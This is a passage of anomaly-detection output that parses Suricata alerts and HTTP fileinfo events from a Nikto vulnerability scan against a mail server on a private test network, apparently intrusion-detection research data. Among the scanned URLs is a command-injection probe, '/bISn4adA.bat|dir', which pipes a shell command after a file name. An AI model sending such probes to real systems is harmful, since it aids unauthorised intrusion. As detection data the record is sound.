"/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": 
"\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.cellsprint\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.cellsprint\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.cellsprint\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.cellsprint", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.cellsprint", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": 
"\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46866,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46866, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", 
"/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":384781809015003,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 384781809015003, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.252999+0000\",\"flow_id\":384781809015003,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46866,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.cellsprint\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.cellsprint\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.25 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.254583 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] 
[Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46868 -> 192.168.10.154:80", "/parser/model/time": 1583349514.254583, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46868, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.254583 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46868 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.25 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.bat|dir", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": 
"{\"timestamp\":\"2020-03-04T19:18:34.254803+0000\",\"flow_id\":911490828394343,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46868,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.bat|dir\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.bat|dir\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.254803, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":911490828394343,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46868,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.bat|dir\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.bat|dir\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46868,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.bat|dir\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.bat|dir\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.bat|dir\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.bat|dir\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.bat|dir", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.bat|dir", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", 
"/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46868,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": 
",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46868, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":911490828394343,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 911490828394343, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.254803+0000\",\"flow_id\":911490828394343,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46868,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.bat|dir\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.bat|dir\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.25 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", 
"/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.257364 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46870 -> 192.168.10.154:80", "/parser/model/time": 1583349514.257364, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46870, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.257364 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46870 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.26 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], 
"AffectedLogAtomValues": [ "\\/bISn4adA.prf", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.257763+0000\",\"flow_id\":648776268834898,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46870,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.prf\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.prf\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.257763, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":648776268834898,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46870,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.prf\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.prf\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46870,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": 
",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.prf\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.prf\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.prf\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.prf\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.prf", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.prf", 
"/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46870,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", 
"/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46870, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":648776268834898,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 648776268834898, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.257763+0000\",\"flow_id\":648776268834898,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46870,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.prf\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.prf\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.26 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", 
"PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.259495 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46872 -> 192.168.10.154:80", "/parser/model/time": 1583349514.259495, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46872, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.259495 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46872 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.26 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ 
"/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.tml", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.259845+0000\",\"flow_id\":2191605830972159,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46872,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.tml\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.tml\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.259845, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", 